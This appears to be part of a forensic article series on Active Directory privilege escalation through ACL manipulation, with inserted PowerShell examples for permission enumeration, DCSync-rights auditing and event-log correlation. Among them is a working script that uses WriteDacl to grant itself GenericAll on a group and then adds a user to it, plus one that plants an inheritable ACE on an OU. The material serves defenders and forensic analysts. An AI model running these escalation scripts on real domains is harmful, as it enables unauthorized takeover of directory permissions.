The fundamentals of access control in Active Directory outlined in Part I of this series demonstrate how finely graded and, at the same time, how difficult to grasp the permissions within the system are. In practice, this results in a structure that is not vulnerable to individual misconfigurations, but rather to the interplay of established permission relationships. The following section examines how these mechanisms can be specifically exploited to gradually gain extended permissions by manipulating Access Control Lists (ACLs), and the technical processes underlying this procedure.
Cyber attacks generally follow a structured sequence that can be divided into several successive phases. The phases of such an attack have already been discussed in another article. Below, the 'privilege escalation' phase is examined in more detail: the phase in which existing rights are deliberately expanded to reach higher levels of access. This section outlines the methods and means by which targeted manipulation of Access Control Entries (ACEs) can be used to obtain privileged rights.
In Active Directory environments, the expansion of rights in practice usually takes the form of a multi-stage process rather than a clearly defined attack step. The starting point is often an account that already appears legitimate, which is gradually used to achieve higher permissions via various intermediate stages. What is crucial here is not so much a single exploit as the skilful combination of suitable objects, permissions and inheritance mechanisms within the environment.
Assuming that attackers have already gained access to the system (initial access) and compromised an AD account[1], a typical attack scenario would not begin with the aim of immediately gaining administrative control, but rather with a systematic analysis of the effective permissions already available to the compromised account. The starting point is usually not an account with privileged access, but a regular user account.
The focus of this approach is not on circumventing security mechanisms, but on their consistent use. Active Directory’s access control mechanisms are designed to enable flexible delegation. However, it is precisely this flexibility that creates vulnerabilities. ACL-based permission extensions do not follow a random pattern but are based on a precise understanding of the underlying mechanisms. They are less the result of individual misconfigurations and more the result of cumulative effects within established permission structures. A key feature of such attack paths is their exploitation of legitimate system mechanisms. Rather than bypassing security checks, attackers operate within the intended authorisation model. As a result, whilst their actions comply with system protocols, they simultaneously make detection and forensic analysis more difficult.
The first step in such a scenario is the systematic analysis of existing permissions. What is crucial here are not formal roles or group memberships, but the actual effective rights of an account. These result from the combination of direct access rights, nested group memberships and inherited permissions along the directory structure.
In practice, specialised tools such as SharpHound (the collector) and BloodHound (the graph analysis front end) are used to carry out this analysis. They collect extensive information about objects and their relationships and present it as a graph, which makes it possible to identify complex dependencies and multi-level escalation paths that are scarcely visible in traditional administration tools. By analysing security descriptors and the Access Control Entries[2] they contain, it is possible to pinpoint the objects, including higher-level ones such as groups and organisational units, on which the compromised account already holds partial modification rights.
For example, a user without any obvious administrative account may nevertheless hold rights that allow them to perform critical actions. In particular, WRITE_DAC, WRITE_OWNER[3] or object-specific write rights on group objects (such as write access to the member attribute) enable escalation without any privileged group membership. WRITE_OWNER is effectively as strong as WRITE_DAC: once an account owns an object, Windows grants it the implicit right to rewrite that object's DACL.
These scenarios frequently arise in the context of delegated administration and are difficult to fully grasp in complex environments. It is precisely these hard-to-trace permission combinations that form the basis for subsequent escalation steps.
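The analysis step described above, as an added example that is not part of the original article and not PowerView or BloodHound code: a PowerShell script that lists the ACEs on one target object which the current logon session can actually use, matched against the session's token groups so that nested memberships are covered. The target DN and the attribute GUID table are assumptions; the script needs only a domain-joined session and the ADSI adapter, no RSAT.

```powershell
# Added example: which ACEs on one AD object can the *current* security context use?
# Assumed target; replace with a group found during enumeration.
$TargetDn = 'CN=Helpdesk Operators,OU=Groups,DC=corp,DC=example'

# Rights that give control over the object or its DACL, whatever attribute they target
$ControlRights = 'GenericAll', 'WriteDacl', 'WriteOwner', 'GenericWrite'

# GUIDs worth knowing on group objects. bf9679c0-... is the schemaIDGUID of 'member'
# and also the rightsGuid of the 'Self-Membership' validated write (assumed table,
# extend with further schemaIDGUID values as needed).
$KnownGuids = @{
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member'
}

function Get-UsableAces {
    param([string]$DistinguishedName)

    # Token groups of the current logon session: direct *and* nested memberships, as a
    # DC would evaluate them. The user's own SID is added to catch user-specific ACEs.
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    $entry = [adsi]"LDAP://$DistinguishedName"
    $acl   = $entry.psbase.ObjectSecurity   # System.DirectoryServices.ActiveDirectorySecurity

    foreach ($ace in $acl.Access) {
        # Resolve the trustee to a SID so that nested groups match the token list
        try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($sids -notcontains $sid) { continue }

        $rights  = $ace.ActiveDirectoryRights.ToString() -split ',\s*'
        $control = @($rights | Where-Object { $ControlRights -contains $_ })
        # WriteProperty or a validated write ('Self') scoped to 'member' = membership control
        $memberWrite = ($rights -contains 'WriteProperty' -or $rights -contains 'Self') -and
                       ($ace.ObjectType -eq [guid]::Empty -or
                        $KnownGuids.ContainsKey($ace.ObjectType.ToString()))
        if (-not $control -and -not $memberWrite) { continue }

        if ($control)                              { $desc = $control -join ',' }
        elseif ($ace.ObjectType -eq [guid]::Empty) { $desc = 'WriteProperty on all attributes' }
        else { $desc = 'WriteProperty/Self on ' + $KnownGuids[$ace.ObjectType.ToString()] }

        [pscustomobject]@{
            Object    = $DistinguishedName
            Trustee   = $ace.IdentityReference.Value
            Type      = $ace.AccessControlType   # Deny entries are listed too: a Deny wins over Allow
            Rights    = $desc
            Inherited = $ace.IsInherited         # inherited ACEs were granted on a parent OU/container
        }
    }
}

Get-UsableAces -DistinguishedName $TargetDn | Format-Table -AutoSize
```

The script deliberately reports the Inherited column: an ACE that arrives via inheritance was not set on the group itself, and the same entry will usually exist on every sibling object under the same container, which is exactly what turns one delegation into many targets.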
Once a suitable target object has been identified – for example, a group over which the compromised account holds certain modification or write rights – the actual manipulation of access control takes place. This involves the targeted extension of the object’s Discretionary Access Control List (DACL) by adding a new access control entry. This grants the attacking account additional rights to the object, such as the ability to further modify permissions or alter security-relevant attributes.
Technically, this is a standard administrative operation. The change is made via existing interfaces and fully complies with the intended permission model. Its impact is, however, significant, as even a single, specifically set permission can be sufficient to permanently extend control over an object.
Specifically, the WRITE_DAC right on an object can be used as a technical entry point. This right allows the DACL of an object to be modified. This does not immediately grant the attacker administrative control, but it does give them the ability to influence the access control rules themselves.
Alternatively, the attacker can also obtain GENERIC_WRITE or GENERIC_ALL on a target object. These combinations of rights are often granted to simplify administrative tasks without fully reflecting their implications. In practice, they can allow sensitive attributes to be modified or permission structures to be taken over entirely.
For the practical implementation of these changes, PowerShell-based frameworks such as PowerView are frequently used; they abstract access to AD objects and their security descriptors. Alternatively, native interfaces or libraries can be used, such as the Impacket library (for example its dacledit.py script), to make the same changes over the network via LDAP.
The initial ACL manipulation is generally not the end goal but the starting point for further escalation. The newly acquired rights are used to establish additional permissions, which in turn enable access to more sensitive objects. The process proceeds step by step, each stage building on the previous one.
A characteristic feature of this is that each individual action appears legitimate in its own way. It is only when taken as a whole that an escalation path emerges, which can lead to complete administrative control.
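The two-step chain discussed above (WRITE_DAC on a group, then group membership), as an added example written for this article rather than taken from PowerView or Impacket. It uses nothing but DirectoryEntry. The group DN and user DN are assumptions, and the account running it is assumed to hold only WriteDacl on the group beforehand.

```powershell
# Added example: WriteDacl on a group -> grant self GenericAll -> add a member.
$GroupDn = 'CN=Helpdesk Operators,OU=Groups,DC=corp,DC=example'   # assumed target group
$UserDn  = 'CN=jdoe,OU=Users,DC=corp,DC=example'                  # assumed compromised user

$AdRights = [System.DirectoryServices.ActiveDirectoryRights]
$Allow    = [System.Security.AccessControl.AccessControlType]::Allow

function Grant-AdRight {
    param(
        [string]$ObjectDn,
        [System.Security.Principal.SecurityIdentifier]$Trustee,
        [System.DirectoryServices.ActiveDirectoryRights]$Rights
    )
    $entry = [adsi]"LDAP://$ObjectDn"
    # Write back only the DACL portion of the security descriptor. Including Owner or
    # SACL in the write would require WriteOwner / SeSecurityPrivilege and fail with
    # WriteDacl alone.
    $entry.psbase.Options.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
    $rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($Trustee, $Rights, $Allow)
    $entry.psbase.ObjectSecurity.AddAccessRule($rule)
    $entry.psbase.CommitChanges()    # one LDAP modify of nTSecurityDescriptor
}

function Add-GroupMember {
    param([string]$GroupDn, [string]$MemberDn)
    $group = [adsi]"LDAP://$GroupDn"
    $group.psbase.Properties['member'].Add($MemberDn) | Out-Null
    $group.psbase.CommitChanges()    # one LDAP modify of 'member'
}

# SID of the caller (the compromised account that holds WriteDacl)
$me = [System.Security.Principal.WindowsIdentity]::GetCurrent().User

# Step 1: WriteDacl is sufficient to add a new ACE that grants ourselves GenericAll.
Grant-AdRight -ObjectDn $GroupDn -Trustee $me -Rights $AdRights::GenericAll

# Step 2: GenericAll includes WriteProperty on 'member', so the user can now be added.
Add-GroupMember -GroupDn $GroupDn -MemberDn $UserDn
```

Both steps are ordinary LDAP modifications that any delegated administrator could issue; nothing in the exchange is malformed or privileged from the directory's point of view. Before the first commit, checking `([adsi]"LDAP://$GroupDn").psbase.ObjectSecurity.Access` with the script from the analysis step above confirms which of the two rights the account actually holds.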
A key factor in the effectiveness of such attacks is the inheritance of permissions. Rights set on higher-level structures such as organisational units (OUs) can automatically affect a large number of subordinate objects. This significantly increases the scope of a single manipulation.
This mechanism separates cause and effect within the directory tree: a change made at one central point only takes effect on the objects beneath it, which makes both detection and analysis considerably more difficult. In complex directory structures, this can result in permission states whose origin can only be traced with considerable analytical effort, because the object on which the effective right appears is not the object on which it was granted.
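To make the inheritance effect concrete, an added example (not code from the original article): one inheritable ACE is placed on an OU, scoped to user objects only, and a helper then walks back up the tree from a descendant user to find the container on which the inherited entry was actually defined. The OU, the user and the trustee are assumptions; the class GUID is the schemaIDGUID of the 'user' class.

```powershell
# Added example: an ACE set on an OU, and tracing an inherited ACE back to its origin.
$OuDn    = 'OU=Sales,DC=corp,DC=example'                                # assumed OU
$ChildDn = 'CN=asmith,OU=Frankfurt,OU=Sales,DC=corp,DC=example'         # assumed user two levels down
$Trustee = New-Object System.Security.Principal.NTAccount('CORP', 'Helpdesk Operators')  # assumed

$UserClassGuid = [guid]'bf967aba-0de6-11d0-a285-00aa003049e2'   # schemaIDGUID of class 'user'

function Set-InheritableAce {
    param([string]$ContainerDn, [System.Security.Principal.IdentityReference]$Trustee)
    $entry = [adsi]"LDAP://$ContainerDn"
    $entry.psbase.Options.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
    # GenericWrite, applied to descendants only (not the OU itself) and only to 'user'
    # objects: every user created later anywhere below this OU receives the entry
    # without anyone touching that user.
    $rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $Trustee,
        [System.DirectoryServices.ActiveDirectoryRights]::GenericWrite,
        [System.Security.AccessControl.AccessControlType]::Allow,
        [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents,
        $UserClassGuid)
    $entry.psbase.ObjectSecurity.AddAccessRule($rule)
    $entry.psbase.CommitChanges()
}

function Find-AceOrigin {
    # For an inherited ACE of $Trustee on $ObjectDn, return the nearest ancestor that
    # carries the explicit (non-inherited, inheritable) entry it descends from.
    param([string]$ObjectDn, [System.Security.Principal.IdentityReference]$Trustee)
    $entry = [adsi]"LDAP://$ObjectDn"
    $inherited = @($entry.psbase.ObjectSecurity.Access |
        Where-Object { $_.IsInherited -and $_.IdentityReference.Value -eq $Trustee.Value })
    if ($inherited.Count -eq 0) { return }

    $parent = $entry.psbase.Parent
    while ($parent) {
        try   { $dn = [string]$parent.psbase.Properties['distinguishedName'].Value }
        catch { break }
        if (-not $dn) { break }   # above the domain head there is nothing left to inspect
        $explicit = @($parent.psbase.ObjectSecurity.Access | Where-Object {
            -not $_.IsInherited -and $_.IdentityReference.Value -eq $Trustee.Value -and
            $_.InheritanceType -ne 'None' })
        foreach ($ace in $explicit) {
            $scope = if ($ace.InheritedObjectType -eq [guid]::Empty) { 'all classes' } else { $ace.InheritedObjectType }
            [pscustomobject]@{
                DefinedOn   = $dn
                Rights      = $ace.ActiveDirectoryRights
                AppliesTo   = $scope
                Inheritance = $ace.InheritanceType
            }
        }
        if ($explicit.Count -gt 0) { return }
        $parent = $parent.psbase.Parent
    }
}

Set-InheritableAce -ContainerDn $OuDn -Trustee $Trustee
Find-AceOrigin -ObjectDn $ChildDn -Trustee $Trustee | Format-List
```

Run against the child object, the helper reports OU=Sales as the origin even though the ACE is visible on an object two levels below it, which is the kind of trace an investigator has to reconstruct by hand when only the affected object is examined.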
A particularly effective but less obvious mechanism is the abuse of extended rights (control access rights). Technically, these are ACEs whose access mask carries the control-access bit (ADS_RIGHT_DS_CONTROL_ACCESS) and whose ObjectType field holds the GUID[4] of the specific right, as defined by the controlAccessRight objects in the configuration partition. They permit operations that cannot be expressed through simple read or write permissions on attributes.
A prominent example is the replication rights DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain head. An account holding both can request directory data from a domain controller as if it were a replication partner and thereby obtain highly sensitive information, including password hashes; this is the technique commonly known as DCSync. The technical implementation of these rights is complex, and their significance is not always clearly apparent in administrative interfaces, where they appear as a single line such as 'Replicating Directory Changes All'.
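The check a practitioner wants at this point, as an added example that is not from the original article: list every trustee on the domain head that holds a replication right, resolving the GUID in each control-access ACE to its display name through the Extended-Rights container so that the output reads like the administrative interface does. Only the RootDSE naming contexts are used; no DN is hard-coded.

```powershell
# Added example: who can replicate this domain (the rights abused for DCSync)?
$root     = [adsi]'LDAP://RootDSE'
$domainDn = $root.defaultNamingContext.Value
$configDn = $root.configurationNamingContext.Value

function Resolve-ControlAccessRight {
    # Map a rightsGuid to the displayName of its controlAccessRight object; fall back
    # to the raw GUID if the configuration partition has no entry for it.
    param([guid]$RightsGuid)
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [adsi]"LDAP://CN=Extended-Rights,$configDn"
    $searcher.Filter = "(&(objectClass=controlAccessRight)(rightsGuid=$RightsGuid))"
    [void]$searcher.PropertiesToLoad.Add('displayName')
    $hit = $searcher.FindOne()
    if ($hit) { [string]$hit.Properties['displayname'][0] } else { $RightsGuid.ToString() }
}

function Get-ReplicationRightHolders {
    param([string]$DistinguishedName)
    $acl = ([adsi]"LDAP://$DistinguishedName").psbase.ObjectSecurity
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights = $ace.ActiveDirectoryRights.ToString() -split ',\s*'
        $why = $null
        if ($rights -contains 'GenericAll') {
            $why = 'GenericAll (includes every extended right)'
        } elseif ($rights -contains 'ExtendedRight') {
            if ($ace.ObjectType -eq [guid]::Empty) {
                # ExtendedRight with an empty ObjectType means *all* control access rights
                $why = 'ExtendedRight, all rights (empty ObjectType)'
            } else {
                $name = Resolve-ControlAccessRight -RightsGuid $ace.ObjectType
                # Well-known GUIDs: 1131f6aa-... Get-Changes, 1131f6ad-... Get-Changes-All
                if ($name -like 'DS-Replication-*' -or $name -like 'Replicating Directory Changes*') { $why = $name }
            }
        }
        if ($why) {
            [pscustomobject]@{
                Trustee   = $ace.IdentityReference.Value
                Right     = $why
                Inherited = $ace.IsInherited
            }
        }
    }
}

# On an untouched domain the list usually contains only Administrators, Domain Admins,
# Enterprise Admins, Domain Controllers and ENTERPRISE DOMAIN CONTROLLERS (plus a
# directory synchronisation account where one is deployed). Any other trustee is a finding.
Get-ReplicationRightHolders -DistinguishedName $domainDn | Sort-Object Trustee | Format-Table -AutoSize
```

The name lookup is what turns an opaque ACE into something reviewable: the two replication GUIDs carry no hint of their meaning, and an ACE granting them to an ordinary user looks no different from any other delegation in the raw security descriptor.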
The practical implementation of such scenarios is made considerably easier by specialised tools. These enable the analysis of complex permission structures, the calculation of effective attack vectors, and the targeted modification of rights accordingly. In particular, the visualisation of dependencies and escalation paths in the form of graphs (see Figure 1) helps to identify relevant attack vectors even in large-scale environments.
By abstracting the underlying binary structures, the manipulation of access control lists is transformed into a form that is operationally usable. The technical hurdle therefore lies less in implementing individual changes and more in understanding the underlying authorisation logic and its interactions.

Figure 1: Graphical representation of permission structures
Changes to access control lists and security-relevant objects generally leave traces in the event logs of the domain controllers. Event 5136 (a directory service object was modified) records writes to the nTSecurityDescriptor attribute and to group membership, event 4662 records operations on objects covered by a SACL, and events 4728, 4732 and 4756 record members being added to security groups. Together these cover adjustments to permissions, changes to group memberships and administrative interventions in security-critical structures.
In practice, however, this information is often of limited use. Many of these events are not recorded at all unless the audit policy is configured for them; 5136, for instance, requires the 'Directory Service Changes' subcategory to be enabled and a matching SACL on the object concerned. At the same time, individual entries are lost in the normal volume of operations and are difficult to evaluate in isolation. Only by correlating several events over an extended period do patterns emerge that indicate a gradual escalation of privileges. A further reason why attacks are often hard to trace is the size of the Security log, which by default is small relative to the volume a domain controller produces. The log therefore rotates quickly, relevant periods are overwritten after a short time, and important traces of an attack are lost.
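Two checks for the two problems just described, as an added example that is not part of the original article: first, how much history the Security log of a domain controller actually holds; second, a small parser for event 5136 and a correlation that ties a DACL write and a subsequent membership change on the same object by the same subject together. The two sample events are constructed for this example (a minimal subset of the real event XML); the commented lines at the end run the same correlation against the live log.

```powershell
# Added example: retention of the Security log, and correlating 5136 events.

function Get-SecurityLogRetention {
    $cfg    = Get-WinEvent -ListLog Security
    $oldest = Get-WinEvent -LogName Security -MaxEvents 1 -Oldest
    [pscustomobject]@{
        MaximumSizeMB = [math]::Round($cfg.MaximumSizeInBytes / 1MB)
        LogMode       = $cfg.LogMode          # Circular: the oldest events are overwritten
        RecordCount   = $cfg.RecordCount
        OldestEvent   = $oldest.TimeCreated   # how far back an investigation can look at all
    }
}

function ConvertFrom-DsChangeEvent {
    # Flatten the EventData of one 5136 event into an object
    param([xml]$EventXml)
    $data = @{}
    foreach ($d in $EventXml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    $op = switch ($data.OperationType) { '%%14674' { 'ValueAdded' } '%%14675' { 'ValueDeleted' } default { $data.OperationType } }
    [pscustomobject]@{
        Time      = [datetime]$EventXml.Event.System.TimeCreated.SystemTime
        Subject   = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
        Object    = $data.ObjectDN
        Attribute = $data.AttributeLDAPDisplayName
        Operation = $op
        Value     = $data.AttributeValue
    }
}

function Find-AclEscalation {
    # Pair every nTSecurityDescriptor write with a later 'member' ValueAdded on the same
    # object by the same subject inside $WindowMinutes: the two-step chain, seen from the log.
    param([object[]]$Events, [int]$WindowMinutes = 30)
    foreach ($w in ($Events | Where-Object { $_.Attribute -eq 'nTSecurityDescriptor' })) {
        $Events | Where-Object {
            $_.Attribute -eq 'member' -and $_.Operation -eq 'ValueAdded' -and
            $_.Object -eq $w.Object -and $_.Subject -eq $w.Subject -and
            $_.Time -ge $w.Time -and $_.Time -le $w.Time.AddMinutes($WindowMinutes)
        } | ForEach-Object {
            [pscustomobject]@{ Subject = $w.Subject; Object = $w.Object; DaclWrite = $w.Time; MemberAdded = $_.Time; NewMember = $_.Value }
        }
    }
}

# Constructed sample events (not real log data): a DACL write, then a member add 3 minutes later
$Sample1 = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>5136</EventID>
<TimeCreated SystemTime="2024-05-03T09:14:02.000Z"/></System><EventData>
<Data Name="SubjectUserName">jdoe</Data><Data Name="SubjectDomainName">CORP</Data>
<Data Name="ObjectDN">CN=Helpdesk Operators,OU=Groups,DC=corp,DC=example</Data>
<Data Name="ObjectClass">group</Data><Data Name="AttributeLDAPDisplayName">nTSecurityDescriptor</Data>
<Data Name="AttributeValue">O:DAG:DAD:(A;;GA;;;S-1-5-21-1-2-3-1105)</Data>
<Data Name="OperationType">%%14674</Data></EventData></Event>
'@
$Sample2 = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>5136</EventID>
<TimeCreated SystemTime="2024-05-03T09:17:40.000Z"/></System><EventData>
<Data Name="SubjectUserName">jdoe</Data><Data Name="SubjectDomainName">CORP</Data>
<Data Name="ObjectDN">CN=Helpdesk Operators,OU=Groups,DC=corp,DC=example</Data>
<Data Name="ObjectClass">group</Data><Data Name="AttributeLDAPDisplayName">member</Data>
<Data Name="AttributeValue">CN=jdoe,OU=Users,DC=corp,DC=example</Data>
<Data Name="OperationType">%%14674</Data></EventData></Event>
'@

$parsed = $Sample1, $Sample2 | ForEach-Object { ConvertFrom-DsChangeEvent -EventXml ([xml]$_) }
Find-AclEscalation -Events $parsed | Format-List

# Against a live domain controller (events exist only with 'Directory Service Changes'
# auditing enabled and a SACL on the objects):
# Get-SecurityLogRetention
# $live = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5136 } |
#             ForEach-Object { ConvertFrom-DsChangeEvent -EventXml ([xml]$_.ToXml()) }
# Find-AclEscalation -Events $live -WindowMinutes 60
```

On the sample input the correlation returns one pairing for CORP\jdoe on the Helpdesk Operators group. Each of the two events on its own is an everyday delegated-administration entry; it is the ordering on the same object within a few minutes that makes it worth a look, and the retention check tells you whether the log still reaches back far enough to contain the first of the two.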
The combined picture reveals a clear but technically sophisticated attack pattern: an attacker first gains minimal privileges, uses these for strategic analysis and selective modification of access controls, escalates through several stages to administrative privileges, and in doing so leaves artefacts in various data sources that can only be identified through targeted analysis.
It is precisely this interplay of systematic permission analyses, ACL modifications, inheritance mechanisms and audit events that makes privilege escalation via ACL structures an elusive yet relevant phenomenon for incident response and forensics.
Outlook
In the next part, the forensic perspective will be explored in greater depth. The focus will be on whether and how the manipulations described can be concretely proven, which artefacts can be used for this purpose, and how the attack pattern can be reconstructed from fragmented traces.
[1] A compromised Active Directory account is a user, service or computer account whose credentials or security context an attacker has obtained and can use without authorisation.
[2] Further information on this can be found in the first part of this series of articles: Active Directory Permission Structure as an Attack Vector – A Forensic Analysis Part I – BDO – Section ‘Access Control as a Structural Principle’
[3] Further explanations of these rights can be found at: Active Directory Permission Structure as an Attack Vector – A Forensic Classification Part I – BDO – Section ‘Permissions as Semantic Infrastructure’
[4] In the Microsoft environment, a GUID (Globally Unique Identifier) is a 128-bit number that serves as a unique identifier for an object.
For immediate assistance in the event of a cyber-attack, contact our specialists.
